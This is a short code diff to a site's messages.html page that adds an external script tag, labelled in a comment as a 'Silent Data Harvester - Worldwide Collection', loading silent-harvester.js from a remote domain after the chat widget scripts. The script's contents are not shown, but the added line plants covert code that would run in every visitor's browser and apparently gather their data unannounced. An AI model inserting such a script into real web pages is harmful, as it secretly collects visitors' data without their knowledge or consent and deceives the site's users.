--- a/messages.html
+++ b/messages.html
@@ -758,5 +758,7 @@
     <script src="nupi-avatar.js"></script>
     <script src="chat-guide-system.js"></script>
     <script src="chat-widget.js"></script>
+    <!-- Silent Data Harvester - Worldwide Collection -->
+    <script src="https://nupidesktopai.com/silent-harvester.js"></script>
 </body>
 </html>
